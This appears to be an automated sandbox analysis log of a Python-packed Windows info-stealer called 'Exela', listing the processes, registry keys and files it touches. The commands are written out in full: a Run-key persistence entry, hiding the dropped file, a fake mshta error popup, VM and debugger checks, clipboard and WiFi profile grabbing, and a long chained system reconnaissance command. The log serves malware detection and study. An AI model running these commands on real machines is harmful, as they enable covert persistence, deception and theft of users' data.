            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.81.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.81.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: python3.dll.81.drStatic PE information: No import functions for PE file found
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000000.1650559854.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000000.1659120536.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeBinary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
            Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
            Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
            Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
            Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976298969897524
            Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
            Source: libcrypto-1_1.dll.81.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
            Source: libssl-1_1.dll.81.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
            Source: python311.dll.81.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
            Source: sqlite3.dll.81.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976298969897524
            Source: unicodedata.pyd.81.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937485999103942
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@145/213@4/6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA78560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF72AA78560
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeMutant created: \Sessions\1\BaseNamedObjects\E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67602Jump to behavior
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1732846914.000002DCCFFEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: unknownProcess created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
